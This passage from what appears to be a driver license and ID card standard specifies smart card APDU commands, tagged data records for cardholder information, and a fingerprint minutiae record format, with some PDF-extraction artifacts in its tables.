7816-4. +Example of application selection +The application shall be selected by use of the following parameters for the APDU. +CLA ‘00’ +INS ‘A4’ +P1 ‘04’ – (select by DF name – the AID) +P2 ‘00’ +L ‘05’ – (length of AID) +c +Data field ‘A0 00 xx xx xx’ – (the AID) +L ‘00’ – return the application label if present +e +The response data field contains the application label. The label shall be ‘Driver License’. +23 + +Example of reading a record from a file +The READ command shall be used to access a specific record number. This example reads record number one from +the issuer file that is known by the short file identifier ’01.’ The APDU parameters for this action are shown below. +CLA ‘00’ +INS ‘B2’ +P1 ‘01’ - specifies record number one +P2 ‘0C’ - read by record number from SFI ‘01’ +L Empty +c +Data field Empty +L 0 - specifies to read the entire record +e +The response data field contains the record. +B.9 File contents +This clause defines the mapping of the machine-readable information elements defined in clause 6. The files contain +the data elements as data objects within specific records. The structure and coding of data objects are defined in +ISO/IEC 7816-4 and 7816-6. Each data object has an identification tag that is specified in hexadecimal coding (for +example, ‘5A’). Standard tags are used wherever possible. The tags defined in this standard use the proprietary +coding option with tag values from ‘C0’ to ‘DF20’. Each data object has a unique tag, a length and a value. The data +objects that may be present in a file are identified as mandatory (M) or optional (O). The definitions contain the +specific reference to the data element number defined in clause 6. +This definition provides for two additional data elements that are not available with magnetic stripe or bar code +technologies. These elements provide for the storage of a digitized photographic image (tag ‘5F40C’) and a digitized +handwritten signature image (tag ‘5F43’) as defined in ISO/IEC 7816-6. These data elements are stored in a separate +file since they may require the reading of multiple records to obtain the data. +B.9.1. EF (Issuer Information) SFI ‘01’ +ISSUER +This EF contains the identity of the issuer of the driver license/identification card and any information related to the +issuing of the driver license. The identity of the issuer in the United States is defined by the ISO IIN assigned to each +state and is in data object ’42.’ In anticipation of use by other countries, the record may contain the country code of +the issuer in data object ‘41’ instead. (See ISO/IEC 7816-6 for additional information.) The data objects defined below +will be read as the first record in the file. Additional records with other data objects may be present in the file at the +issuer’s discretion. These records are beyond the scope of this standard. +The maximum size of this record is 127 bytes. +24 + +Short EF Identifier: '01'H Structure: Record Mandatory EF +Tag Description M/O Length Char Set Data Element +‘42’ Issuer Identification Number M Fixed - 6 N 15 +‘44’ Application Version Number M Fixed - 2 N n/a +‘DF00’ Security Version Number M Fixed - 2 N n/a +‘5A’ Driver License/ID Number M Var - 25 N or AN 6 (and 7) +‘5F25’ Issue Date M Fixed – 8 AN 14 +‘DF0C’ Issue Timestamp O Var - 26 N 45 +‘DF0D’ Number of Duplicates O Fixed - 2 N 46 +‘DF08’ Unique Customer Identifier O Var - 25 AN 50 +B.9.2. EF (Driver License data) SFI ‘02’ +DL +This EF contains the required and optional data elements for the cardholder as data objects in fixed content records. +The mapping of data objects to records is specified below. The contents and maximum sizes of these records are: +Record number Contents Maximum size +1 Mandatory data elements 201 +2 Personal characteristics 192 +3 Permit data elements, 186 +Residence address and mailing +address +4 ‘AKA’ data elements 189 +25 + +The file is variable length and may contain additional records. The file must contain at least one record, the mandatory +data elements. +B.9.2.1 Record 1 – mandatory data elements +Short EF Identifier: '02'H Structure: Record Mandatory EF +Tag Description M/O Length Char Set Data Element +‘42’ Issuer Identification Number M Fixed - 6 N 15 +‘5A’ Driver License/ID Number M Var - 25 AN 6 (and 7) +’5F20’ Driver License Name M Var - 35 AS 1 +’5F42’ Driver Address M Var - 29 ANS 2 +’D7’ Driver Mailing City M Var - 15 AS or AN 3 +‘D8’ +Driver Mailing Jurisdiction Code M Fixed - 2 AN 4 +‘D9’ +Driver Mailing Postal Code M Fixed - 11 ANS 5 +‘C0’ +Driver License Classification M F ixed - 4 AN 8 +Code +‘C1’ +Driver License Restriction Code M F ixed - 10 AN 9 +‘C2’ +Driver License Endorsement M F ixed - 5 AN 10 +Code +‘5F24’ +Driver License Expiration Date M F ixed - 8 N 11 +‘5F2B’ +Date of Birth M F ixed - 8 N 12 +‘5F35’ +Driver Sex M F ixed - 1 N 13 +‘5F26’ +Driver License or ID Document M F ixed - 8 N 14 +Issue Date +26 + +B.9.2.2 Record 2 – personal characteristics +Short EF Identifier: '02'H Structure: Record Mandatory EF +Tag Description M/O Length Char Set Data Element +‘CA’ +Height (FT/IN) O Fixed - 3 N 20 +or +or +‘DF0A’ +Height (CM) 43 +‘CB’ Weight (LBS) O Fixed - 3 N 21 +or or +‘DF0B’ Weight (KG) 44 +‘CC’ Eye Color O Fixed - 3 N 22 +‘CD’ Hair Color O Fixed - 3 N 23 +‘D0’ Driver Last Name O Var – 35 AN 31 +‘D1’ Driver First Name O Var – 35 AN 32 +‘D2’ Driver Middle Name or Initial O Var – 35 AN 33 +‘D3’ Driver Name Suffix O Fixed – 3 AN 34 +‘D4’ Driver Name Prefix O Fixed – 5 AN 35 +‘C9’ +Social Security Number O Fixed – 9 N 24 +‘DF06’ +Medical Indicator/Codes O Var – 20 AN 47 +‘DF07’ +Organ Donor O Fixed – 10 AN 48 +27 + +B.9.2.3 Record 3 – permit data elements, residence address and mailing address +Short EF Identifier: '02'H Structure: Record Mandatory EF +Tag Description M/O Length Char Set Data Element +‘C3’ Driver Permit Classification O +Code +F ixed - 2 A 2 5 +‘C4’ Driver Permit Expiration Date +O F ixed - 8 N 2 6 +‘C5’ Permit Identifier +O F ixed - 25 AN 2 7 +‘C6’ Driver Permit Issue Date +O F ixed - 8 N 2 8 +‘C7’ +Driver License Restriction Code O F ixed - 10 AN 2 9 +‘C8’ +Driver License Endorsement O F ixed - 6 AN 3 0 +Code +‘D5’ +Driver Mailing Street Address 1 O V ar – 20 AN 36 +‘D6’ +Driver Mailing Street Address 2 O V ar – 20 AN 37 +‘DA’ +Driver Residence Street O V ar – 20 AN 38 +Address 1 +‘DB’ +Driver Residence Street O V ar – 20 AN 39 +Address 2 +‘DC’ +Driver Residence City O V ar – 15 AN 40 +‘DD’ +Driver Residence Jurisdiction O F ixed - 2 AN 41 +Code +‘DE’ +Driver Residence Postal Code O F ixed - 11 AN 42 +‘CE’ +Non-Resident Indicator O Fixed - 1 A 49 +28 + +B.9.2.4 Record 4 – “AKA” data elements +Short EF Identifier: '02'H Structure: Record Mandatory EF +Tag Description M/O Length Char Set Data Element +‘DF2B’ +Driver "AKA" Date of Birth O Fixed - 8 N 51 +‘DF09’ +Driver "AKA" Social Security O Fixed - 9 N 52 +Number +‘DF20’ +Driver "AKA" Name O Var – 35 AN 53 +‘DF01’ +Driver "AKA" Last Name O Var – 35 AN 54 +‘DF02’ +Driver "AKA" First Name O Var – 35 AN 55 +‘DF03’ +Driver "AKA" Middle Name or O Var – 35 AN 56 +Initial +‘DF04’ +Driver "AKA" Name Suffix O Fixed - 3 AN 57 +‘DF05’ +Driver "AKA" Name Prefix O Fixed - 5 AN 58 +B.9.3 EF (Magnetic Stripe Information) SFI ‘03’ +MAG +This EF contains the image of the data contained in the magnetic stripe(s) All driver license information contained in a +magnetic stripe shall be stored in this file. Any combination of the three tracks on the magnetic stripe may be present. +The data shall be written in ASCII character coding structure. The data objects exclude the special characters used for +start sentinel, end sentinel and LRC. +The maximum size of this record is 201 bytes. +Note The use of this data format should be maintained until the use of the magnetic stripe has been completely +phased out and all interface devices (terminals) have been revised to use only the data in EF or EF . This format +DL ISSUER +may be needed during the lengthy transition process and migration to the use of the ICC in place of the magnetic +stripe. +29 + +Short EF Identifier: '03'H Structure: Record Mandatory EF +Tag Description M/O Length Char Set Data Element +‘56’ Track 1 in ASCII O Var – 79 ANS Track 1 +‘57’ Track 2 in ASCII O Var – 37 N Track 2 +‘58’ Track 3 in ASCII O Var - 79 AN Track 3 +B.9.4 EF (Digitized Portrait Image) SFI ‘04’ +POR +This EF contains the digitized image of the cardholder’s portrait image. This data element is contained in a +cardholder image template ‘6C.’ Use of the template code is optional. See ISO/IEC 7816-6 for a more detailed +description of additional data elements that may be in the template. Since the data element may be large, multiple +READ RECORD commands may have to be issued to obtain the full record. See ISO/IEC 7816-4 for more +information. +Short EF Identifier: '04'H Structure: Record Mandatory EF +Tag Description Length Char Set Data Element +M/O +‘6C’ Template for digitized image O Var B N/a +information +‘5F40’ Portrait image O Var B N/a +(See ISO/IEC 10918-1) +B.9.5 EF (Digitized Handwritten Signature Image) SFI ‘05’ +SIG +This EF contains the digitized image of the cardholder’s handwritten signature. This data element is contained in a +cardholder image template ‘6C.’ Use of the template code is optional. See ISO/IEC 7816-6 for a more detailed +description of additional data elements that may be in the template. Since the data element may be large, multiple +READ RECORD commands may have to be issued to obtain the full record. See ISO/IEC 7816-4 for more +information. +Short EF Identifier: '05'H Structure: Record Mandatory EF +30 + +Tag Description Length Char Set Data Element +M/O +‘6C’ Template for digitized image O Var B N /a +information +‘5F43’ Handwritten signature image O Var B N /a +(see ISO/IEC 11544) +B.10 Security +lCCs can be used to secure and protect the information they contain. For example, because of privacy issues, an +issuer may decide to restrict the access of some information stored in the card to the cardholder and may require a +PIN for authentication. This standard does not impose any security structure. This standard does acknowledge the +fact that security restrictions imposed by a given issuer may induce the IC card to reject a command when used in an +incorrect security context (e.g., UPDATE RECORD of a file protected against modification such as the Issuer Number +EF). A security scheme version number may be specified in the data file with the issuer information, EF . +ISSUER +Some of the optional data elements may require more security. These data elements may be placed in other files, +with separate security constraints for each file. The recommended technique is to use the record structures defined +above in another EF with the next available short file identifier: '06'H, '07'H, etc. +The magnetic stripe data in EF should not be encrypted and it should be available to be read by any interface +MAG +device. The data in EF should be updated only by the issuer. +MAG +The portrait and handwritten signatures images should not be encrypted and should be available to be read by any +interface device. The data in EF and EF should be written once by the issuer. The security risks coincident with +POR SIG +the ability to update these images should be carefully considered by the issuer. It is recommended that the card be +reissued if this data must be changed. +31 + +B.11 Data element tags +Ref. # Data element/label Tag SFI Record +1 Driver License Name ‘5F20’ ‘02’ 1 +2 Driver Address ‘5F42’ ‘02’ 1 +3 Driver Mailing City ‘D7’ ‘02’ 1 +4 Driver Mailing Jurisdiction Code ‘D8’ ‘02’ 1 +5 Driver Mailing Postal Code ‘D9’ ‘02’ 1 +6 Driver License/ID Number ‘5A’ ‘01’ 1 +‘02’ 1 +7 ID/DL # * - - - +8 Driver License Classification Code ‘C0’ ‘02’ 1 +9 Driver License Restriction Code ‘C1’ ‘02’ 1 +10 Driver License Endorsement Code ‘C2’ ‘02’ 1 +11 Driver License Expiration Date ‘5F24’ ‘02’ 1 +12 Date of Birth ‘5F2B’ ‘02’ 1 +13 Driver Sex ‘5F35’ ‘02’ 1 +14 Driver License or ID Document Issue Date ‘5F26’ ‘02’ 1 +15 ISO Issuer Identifier Number (IIN) ‘42’ ‘01’ 1 +‘02’ 1 +16 Driver License or Identification Card Identifier ‘4F’ DF +name +17 Color Photograph or Image ‘5F40’ ‘04’ Multiple +template ‘6C’ +18 Signature ‘5F43’ ‘05’ multiple +template ‘6C’ +19 Security Features ** - - - +32 + +Ref. # Data element/label Tag SFI Record +20 Height (FT/IN) ‘CA’ ‘02’ 2 +21 Weight (LBS) ‘CB’ ‘02’ 2 +22 Eye Color ‘CC’ ‘02’ 2 +23 Hair Color ‘CD’ ‘02’ 2 +24 Social Security Number ‘C9’ ‘02’ 2 +25 Driver Permit Classification Code ‘C3’ ‘02’ 3 +26 Driver Permit Expiration Date ‘C4’ ‘02’ 3 +27 Permit Identifier ‘C5’ ‘02’ 3 +28 Driver Permit Issue Date ‘C6’ ‘02’ 3 +29 Driver Permit Restriction Code ‘C7’ ‘02’ 3 +30 Driver Permit Endorsement Code ‘C8’ ‘02’ 3 +31 Driver Last Name ‘D0’ ‘02’ 2 +32 Driver First Name ‘D1’ ‘02’ 2 +33 Driver Middle Name or Initial ‘D2’ ‘02’ 2 +34 Driver Name Suffix ‘D3’ ‘02’ 2 +35 Driver Name Prefix ‘D4’ ‘02’ 2 +36 Driver Mailing Street Address 1 ‘D5’ ‘02’ 3 +37 Driver Mailing Street Address 2 ‘D6’ ‘02’ 3 +38 Driver Residence Street Address 1 ‘DA’ ‘02’ 3 +39 Driver Residence Street Address 2 ‘DB’ ‘02’ 3 +40 Driver Residence City ‘DC’ ‘02’ 3 +41 Driver Residence Jurisdiction Code ‘DD’ ‘02’ 3 +42 Driver Residence Postal Code ‘DE’ ‘02’ 3 +43 Height (CM) ‘DF0A’ ‘02’ 2 +44 Weight (KG) ‘DF0B’ ‘02’ 2 +45 Issue Timestamp ‘DF0C’ ‘01’ 1 +33 + +Ref. # Data element/label Tag SFI Record +46 Number of Duplicates ‘DF0D’ ‘01’ 1 +47 Medical Indicator/Codes ‘DF06’ ‘02’ 2 +48 Organ Donor ‘DF07’ ‘02’ 2 +49 Non-Resident Indicator ‘CE’ ‘02’ 3 +50 Unique Customer Identifier ‘DF08’ ‘01’ 1 +51 Driver "AKA" Date Of Birth ‘DF2B’ ‘02’ 4 +52 Driver "AKA" Social Security Number ‘DF09’ ‘02’ 4 +53 Driver "AKA" Name ‘DF20’ ‘02’ 4 +54 Driver "AKA" Last Name ‘DF01’ ‘02’ 4 +55 Driver "AKA" First Name ‘DF02’ ‘02’ 4 +56 Driver "AKA" Middle Name ‘DF03’ ‘02’ 4 +57 Driver "AKA" Suffix ‘DF04’ ‘02’ 4 +58 Driver "AKA" Prefix ‘DF05’ ‘02’ 4 +Magnetic Stripe Track 1 ‘56’ ‘03’ 1 +Magnetic Stripe Track 3 ‘57’ ‘03’ 1 +Magnetic Stripe Track 3 ‘58’ ‘03’ 1 +Application version number ‘44’ ‘01’ 1 +Security version number ‘DF00’ ‘01’ 1 +* The driver license number extension is included in element 6. +** The smart card provides its own security features. +34 + +Annex C +(normative) +Finger imaging +Introduction +This annex defines standards to ensure interoperability in the collection and use of finger imaging with driver license +and identification cards. +C.1 Conformance +The use of finger imaging and finger image data with driver license and identification cards shall comply with the +following: ANSI/NIST-CSL1-1993, CJIS/FBI IAFIS-IC-0110, and CJIS-RS-0010, BioAPI Specification Version 1.00, +The BioAPI Consortium, March 30, 2000. +C.2 Application Definitions +C.2.1 Verification +A one-to-one comparison of the currently collected finger image with a previously collected finger image associated +with the claimed identity being verified. The previously collected finger image may be either retrieved from a database +or placed in machine readable form on the card. +C.2.2 Search +A one-to-many comparison on a database to determine the unknown identity of the individual being processed or to +determine uniqueness of the individual being enrolled to ensure one identity per person. This process reduces the +possibility of one person having multiple identities in the database. +C.2.3 Core +The approximate center of the fingerprint pattern as defined for the various pattern types. +C.3 Finger Selection +A Driver License or Identification Card shall include biometric data collected from a minimum of two fingers. Selection +of fingers collected shall be in the following order: +1) Left Fore (Index) +2) Right Fore (Index) +3) Left Thumb +4) Right Thumb +35 + +5) Left Middle +6) Right Middle +7) Left Ring +8) Right Ring +9) Left Little +0) Right Little +Figure C.1 — Finger Selection +If an individual is missing the selected finger, the next finger in this order shall be used. Where usable finger images +are not available, this shall be noted in the record describing the hand configuration. +C.4 Image Quality +There are two factors in collecting quality finger images: the collection device performance and the actual quality of +each image collection in terms of repeatability and consistency needed for successful matching processes. +C.4.1 Finger Image Collection Device +Finger live-scan collection devices shall conform to CJIS-RS-0010 Appendix G. This specification sets performance +standards on finger image scanners for resolution, geometric image accuracy, modulation transfer function, signal-to- +noise ratio, grayscale range, grayscale linearity, and grayscale uniformity. +C.4.2 Finger Image Collection Result +The imaging of the finger pattern shall result in an image in which the core of the pattern is positioned within 25% of +the image center. The ridge pattern shall be clearly visible (smudge-free) with differentiable ridges and valleys for the +entire area around the core. +C.5 Compression +If compression is used it shall be Criminal Justice Information Services CJIS/FBI IAFIS-IC-0110 Wavelet Scalar +Quantization (WSQ). The average compression ratio applied using WSQ shall not be greater than 15:1. +36 + +C.6 Data Format +Finger image data shall be interchanged between jurisdictions using the data format specified in ANSI/NIST-CSL1- +1993 “Data Format for the Interchange of Fingerprint Information”. The configuration of the data shall include Record +type1 Transaction information, record type 2 User-Defined Text, and record type 4 Fingerprint image data (high- +resolution grayscale). +NOTE Because different AFIS use minutiae and potentially use other features extracted from the finger image to improve +speed and performance, interchange between jurisdictions shall be accomplished using finger images, not minutiae data, so that +the best possible matching performance can be achieved. +C.7 Minutiae Extraction Introduction +This section of the Annex provides interoperability between different finger matchers for the purposes of one-to-one +verification of an individual’s identity against a previously collected and stored finger record. The interoperability is +based on defining the finger minutiae extraction rules and record format that are common to most all finger matchers +for acceptable matching accuracy, while allowing for proprietary data to be attached so that the highest accuracy can +be maintained for matching accomplished with the same matcher type. +C.8 External Standards Referenced +BioAPI Specification Version 1.00, The BioAPI Consortium, March 30, 2000 +C.9 Definitions +C.9.1 +Filtering +partitioning a database through the use of exogenous information about the user not discernible from the biometric +patterns, such as sex, age or race +C.9.2 +Friction Ridge +The ridges present on the skin of the fingers and toes, the palms and soles of the feet, which makes contact with an +incident surface under normal touch. On the fingers, the unique patterns formed by the friction ridges make up +fingerprints. +C.9.3 +Live-Scan Print +a fingerprint image that is produced by scanning or imaging a live finger to generate an image of the friction ridges +C.9.4 +Minutia (single) +Minutiae (pl) +Friction ridge characteristics that are used to individualize a fingerprint. Minutiae occur at points where a single friction +ridge deviates from an uninterrupted flow. Deviation may take the form of ending, division, or immediate origination +and termination. +C.9.5 +Resolution +the number of pixels (picture elements) per unit distance in the image of the fingerprint +37 + +C.9.6 +Ridge Ending +The point at which a friction ridge terminates or, alternatively, begins. A ridge ending is surrounded on three sides by +valley. +C.9.7 +Ridge Bifurcation +the point at which a friction ridge splits into two ridges or, alternatively, where two separate friction ridges combine into +one +C.9.8 +Valley +the area surrounding a friction ridge, which does not make contact with an incident surface under normal touch +C.10 Minutiae Description +C.10.1 Principle +Establishment of a common feature-based representation must rest on agreement on the fundamental notion for +representing a fingerprint. A significant number of technology providers follow a traditional approach of encoding a +fingerprint through location of “minutia” points. These minutiae are points located at the places in the fingerprint image +where friction ridges end or split into two ridges. Describing a fingerprint in terms of the location and direction of these +ridge endings and splits provides sufficient information to reliably determine whether two fingerprint records are from +the same finger. +Fingerprint images can be represented with “light ridges” or “dark ridges”. The minutia points shall be located in such a +way that the points and their directions do not change when the light and dark polarity of the image is inverted. This +decision not only provides for consistent data extraction regardless of image polarity, but also ensures equal behavior +of ending and bifurcation points with respect to image degradations such as noise and contrast variance. The +specifications of minutia location and minutia direction described below accomplish this. See Figure C.2 for an +illustration of the definitions below. +C.10.2 Minutia Type +Each minutia point has a “type” associated with it. There are two major types of minutia: a “ridge ending” and a “ridge +bifurcation” or split point. There are other types of “points of interest” in the friction ridges that occur much less +frequently and are more difficult to define precisely. This standard defines a category of “other” minutia for points that +are not clearly a ridge ending nor a bifurcation. +C.10.3 Minutia Location +C.10.3.1 Coordinate System +The coordinate system used to express the minutia points of a fingerprint shall be a Cartesian coordinate system. +Points shall be represented by their X and Y coordinates where X is increasing to the right and Y is increasing upward. +Note that this is in agreement with typical mathematical graphing practice, but the direction of the Y-axis is the +opposite of most imaging and image processing use. The X and Y coordinates of the minutia points shall be in pixel +units, with the spatial resolution of a pixel given in the “X Resolution” and “Y Resolution” fields of the format. X and Y +resolutions are stated separately. +C.10.3.2 Minutia Placement on a Ridge Ending +The minutia point for a ridge ending shall be defined as the point of forking of the medial skeleton of the valley area +immediately in front of the ridge ending. If the valley area were thinned down to a single-pixel-wide skeleton, the point +38 + +where the three legs intersect is the location of the minutia. In simpler terms, the point where the valley “Y”’s, or +(equivalently) where the three legs of the thinned valley area intersect. +C.10.3.3 Minutia Placement on a Ridge Bifurcation +In corresponding fashion, the minutia point for a ridge bifurcation shall be defined as the point of forking of the medial +skeleton of the ridge. If the ridge were thinned down to a single-pixel-wide skeleton, the point where the three legs +intersect is the location of the minutia. In simpler terms, the point where the ridge “Y”’s, or (equivalently) where the +three legs of the thinned ridge intersect. +C.10.3.4 Minutia Placement on Other Minutiae Types +For minutiae other than a bifurcation or ridge ending the placement and angle of direction shall be vendor defined. +C.10.4 Minutia Direction +C.10.4.1 Angle Conventions +Angles are expressed in standard mathematical format, with zero degrees to the right and angles increasing in the +counterclockwise direction. +C.10.4.2 Angle of a Ridge Ending +The angle of a ridge ending is defined as the angle of a line segment originating at the minutia point location, and +extending to the end of the medial skeleton of the ridge itself. In other words, the angle of a line from the minutia point +to the point at the end of the thinned ridge. +C.10.4.3 Angle of a Ridge Bifurcation +The angle of a ridge bifurcation is defined as the angle of a line segment originating at the minutia point location, and +extending to the end of the medial skeleton of the area between the two ridge branches. In other words, the angle of a +line from the minutia point to the endpoint of the enclosed valley. +39 + +q +Bifurcation +Ridge Ending +Figure C.2 - Minutia Location +40 + +C.11 Finger Minutiae Record Format +The minutiae record format shall be used to achieve interoperability between finger matchers providing a one-to-one +verification. The minutia data shall be represented in a common format, containing both public and private (proprietary) +data. With the exception of the Format Identifier and the Version number for the standard, which are null-terminated +ASCII character strings, all data is represented in binary format. There are no record separators or field tags; fields are +parsed by byte count. +All multibyte quantities are represented in Big-Endian format; that is, the more significant bytes of any multibyte +quantity are stored at lower addresses in memory than (and are transmitted before) less significant bytes. All numeric +values are fixed-length integer quantities, and are unsigned quantities. +The organization of the record is as follows: +· A fixed-length (26-byte) record header containing information about the overall record, including the number of +fingers represented and the overall record length in bytes; +· A Single Finger record for each finger, consisting of: +· A fixed-length (4-byte) header containing information about the data for a single finger, including the number of +minutiae; +· A series of fixed-length(6-byte) minutia point descriptions, including the position, type, angle and quality of the +minutia point; +· One private data areas for each finger, containing vendor-specific information. +C.11.1 Record Header +There shall be one and only one record header for minutiae record to hold information describing the identity and +characteristics of device that generated the minutiae data. +C.11.1.1 Format Identifier +The Finger Minutiae Record shall begin with the three ASCII characters “FMR” to identify the record as following this +standard, followed by a zero byte as a NULL string terminator. +C.11.1.2 Version Number +The version number for the version of this standard used in constructing the minutiae record shall be placed in four +bytes. This version number shall consist of three ASCII numerals followed by a zero byte as a NULL string terminator. +The first and second character will represent the major revision number and the third character will represent the minor +revision number. +Upon approval of this specification, the version number shall be “ 10” (an ASCII space followed by an ASCII ‘1’ and an +ASCII ‘0’). +C.11.1.3 Length of Record +The length of the entire record shall be recorded in two bytes. +41 + +C.11.1.4 System Vendor ID +These two bytes shall uniquely identify the vendor or “owner” of the encoding equipment. This “owner code” shall use +values defined and maintained by the International Biometric Industry Association (www.ibia.org). A value of zero will +not be allowed. +C.11.1.5 Feature Extraction Software ID +The feature extraction version shall be recorded in two bytes. A value of all zeros will be acceptable and will indicate +that the SW ID is unreported. The value of this field is determined by the vendor. Applications developers may obtain +the values for these codes from the vendor. +C.11.1.6 Scanner ID +The scanner ID shall be recorded in two bytes. A value of all zeros will be acceptable and will indicate that the scanner +ID is unreported. The value of this field is determined by the vendor. Applications developers may obtain the values for +these codes from the vendor. +C.11.1.7 Size of Scanned Image in X direction +The size of the original image in pixels in the X direction shall be contained in two bytes. +C.11.1.8 Size of Scanned Image in Y direction +The size of the original image in pixels in the Y direction shall be contained in two bytes. +C.11.1.9 Scan Rate in X direction +The resolution of the finger scanner shall be recorded in two bytes having the units of pixels per centimeter. The value +of the sensor X resolution shall not be zero. +C.11.1.10 Scan Rate in Y direction +The resolution of the finger scanner shall be recorded in two bytes having the units of pixels per centimeter. The value +of the sensor Y resolution shall not be zero. +C.11.1.11 Number Of Fingers +The number of fingers contained in the minutiae record shall be recorded in one byte. +C.11.1.12 Reserved Byte +A single byte is reserved for future revision of this specification. For Version 1.0 of this standard, this byte must be set +to 0. +C.11.2 Single Finger Record Format +C.11.2.1 Finger Header +A finger header shall start each section of finger data providing information for that finger. There shall be one finger +header for each finger contained in the finger minutiae record. The finger header will occupy a total of four bytes as +described below. Note that it is permissible for more than one finger record to represent the same finger, with +(presumably) different data, perhaps in the private area. +42 + +C.11.2.1.1 Finger Position +The finger position shall be recorded in one byte. The codes for this byte shall be as defined in Table 5 of ANSI/NIST- +CSL 1-1993, “Data Format for the Interchange of Fingerprint Information”. This table is reproduced here for +convenience. Only codes 0 through 10 shall be used; the “plain” codes are not relevant for this standard. +Table C.1 - Finger Position codes +Finger position Code +Unknown finger 0 +Right thumb 1 +Right index finger 2 +Right middle finger 3 +Right ring finger 4 +Right little finger 5 +Left thumb 6 +Left index finger 7 +Left middle finger 8 +Left ring finger 9 +Left little finger 10 +Plain right thumb 11 +Plain left thumb 12 +Plain right four fingers 13 +Plain left four fingers 14 +C.11.2.1.2 Impression Type +The impression type of the finger images that the minutiae data was derived from shall be recorded in one byte. The +codes for this byte shall be as defined in Table 4 of ANSI/NIST-CSL 1-1993, “Data Format for the Interchange of +Fingerprint Information”. This table is reproduced here for convenience. Only codes 0 through 3 shall be used; the +“latent” codes are not relevant for this standard. +Table C.2 - Impression Type codes +Description Code +Live-scan plain 0 +Live-scan rolled 1 +Nonlive-scan plain 2 +Nonlive-scan rolled 3 +Latent impression 4 +Latent tracing 5 +Latent photo 6 +Latent lift 7 +43 + +C.11.2.1.3 Finger Quality +The quality of the overall finger minutiae data shall be between 0 and 100 and recorded in one byte. This quality +number is an overall expression of the quality of the finger record, and represents quality of the original image, of the +minutia extraction and any additional operations that may affect the minutia record. A value of 0 shall represent the +lowest possible quality and the value 100 shall represent the higher possible quality. The numeric values in this field +will be set in accordance with the general guidelines contained in Section 2.1.42 of the “BioAPI H-Level Specification +Version 1.00”. This value may be used by the matcher to determine its certainty of verification. +C.11.2.1.4 Number of Minutiae +The number of minutiae recorded for the finger shall be recorded in one byte. +C.11.2.2 Finger Minutiae Data +The finger minutiae data for a single finger shall be recorded in blocks of six bytes per minutia point. The order of the +minutiae is not specified. +C.11.2.2.1 Minutiae Type +The type of minutiae will be recorded in the first two bits of the upper byte of the X coordinate. There will be two bits +reserved at the beginning of the upper byte of the Y coordinate for future use. The bits “00” will represent a minutia of +“other” type, “01” will represent a ridge ending and “10” will represent a bifurcation. +C.11.2.2.2 Minutiae Position +The X coordinate of the minutia shall be recorded in the rest of the first two bytes (fourteen bits). The Y coordinate +shall be placed in the lower fourteen bits of the following two bytes. The coordinates shall be expressed in pixels at the +resolution indicated in the record header. Note that position information shall be present for each minutia point, +regardless of type, although position for minutiae of type “other” is vendor defined. +C.11.2.2.3 Minutiae Angle +The angle of the minutia shall be recorded in one byte in units of 2 degrees. The value shall be a non-negative value +between 0 and 179, inclusive. For example, an angle value of 5 represents 10 degrees. Note that angle information +shall be present for each minutia point, regardless of type, although angle for minutiae of type “other” is vendor +defined. +C.11.2.2.4 Minutiae Quality +The quality of each minutia shall be recorded in one byte. The quality figure shall range from 100 as a maximum to 1 +as a minimum. Any equipment that does not supply quality information for individual minutia points shall set all quality +values to 0. +C.11.3 Proprietary Data +The optional section of the finger minutiae record is open to placing proprietary data required by the matcher to +maintain its highest performance level. The size of this section should be kept as small as possible, augmenting the +data stored in the standard minutiae section. The proprietary data for each finger shall immediately follow the standard +minutiae data. +C.11.3.1 Type Identification Code +The type identification code shall be recorded in two bytes, and shall distinguish the format of the private area (as +defined by the Vendor specified in field C.11.1.4). A value of zero shall indicate that there is no following proprietary +data. This code shall be maintained by the vendor. +44 + +C.11.3.2 Length of Data +The length of the proprietary data section, including the vendor identification and length of data fields, shall be +recorded in two bytes. This value is used to skip to the next finger minutiae data if the matcher cannot decode and use +this data. If the type identification (field C.11.3.1) for the private area is zero, indicating no private data, this field shall +not be present. +C.11.3.3 Private Data +The data field of the proprietary data is specifically defined by the equipment that is generating the finger minutiae +record. If the type identification (field C.11.3.1) for the private area is zero, indicating no private data, this field shall not +be present. +45 + +Minutiae Record Format Summary +The following table is a reference for the fields present in the Finger Minutia Record format. For more specific +information, please refer to the text and to the Record Format Diagrams in the next section. +Table C.3 - Minutia Record Format Summary +Field Size Valid Values Notes +Format Identifier 4 bytes ‘F’ ‘M’ ‘R’ 0x0 “FMR ” – finger minutiae record +Version of this standard 4 bytes n n n 0x0 ” XX” +Length of total record 2 bytes >= 26 In bytes +Scan System +Vendor / Format owner ID 2 bytes Registration authority controlled +Feature Extraction SW Ver. 2 bytes Vendor specified +Scanner ID 2 bytes Vendor specified +Image Size in X 2 bytes in pixels +Image Size in Y 2 bytes in pixels +Sensor X Resolution 2 bytes in pixels per cm +Sensor Y Resolution 2 bytes in pixels per cm +Number of Fingers 1 byte +Reserved 1 byte 0x00 Always 0x00 currently +Finger Position 1 byte 0 to 11 Refer to ANSI/NIST standard +Impression Type 1 byte 0 to 3 Refer to ANSI/NIST standard +Finger Quality 1 byte 0 to 100 0 to 100 +Number of Minutiae 1 byte +X 2 byte Expressed in image pixels +(minutia type in upper 2 bits) +Y 2 byte Expressed in image pixels +(upper 2 bits reserved) +q 1 byte 0 to 180 Resolution is 2 degrees +Quality 1 byte 0 to 100 1 to 100 (0 indicates “quality not reported”) +Type Code for Private Area 2 bytes 0x0000 = no private area +Length of private feature area 2 bytes only present if Type Code non-zero +Private feature area Specified in only present if Type Code non-zero +previous +field +46 +drocer +regnif +aitunim +regnif + +C.12 Record Format Diagrams +C.12.1 Overall Record Format +C.11.2 C.11.2 +C.11.3 +C.11.1 Finger Minutia Finger Minutia C.11.3 +Private Data +Record Header Record Record Private Data +see C.12.2 belowsee C.12.3 below see C.12.3 belowSeeC.12.5 below see C.12.5 below +One header One finger minutia One private data area per +per record – record per finger finger (Type ID = 0 if no +private data) +22 bytes +C.12.2 Record Header +C.11.1.1 C.11.1.2 C.11.1.3 C.11.1.4 C.11.1.5 C.11.1.6 +Format ID Spec Version Record Length Vendor ID SW ID Scanner ID +’F’‘M’‘R’0 ’ ’‘X’‘X’0 length vendor ID software ID scanner ID +4 bytes 4 bytes 2 bytes 2 bytes 2 bytes 2 bytes +C.11.1.7 C.11.1.8 C.11.1.9 C.11.1.10 C.11.1.11 C.11.1.12 +X image size Y image size X scan rate Y scan rate # of fingers Reserved byte +X image size Y image size X scan rate Y scan rate # of fingers 0x00 +2 bytes 2 bytes 2 bytes 2 bytes 1 byte 1 byte +C.12.3 Single Finger Minutia Record +C.11.2.1.1 C.11.2.1.2 C.11.2.1.3 C.11.2.1.4 C.11.2.2 C.11.2.2 +Finger Position Impression Type Finger Quality Number of 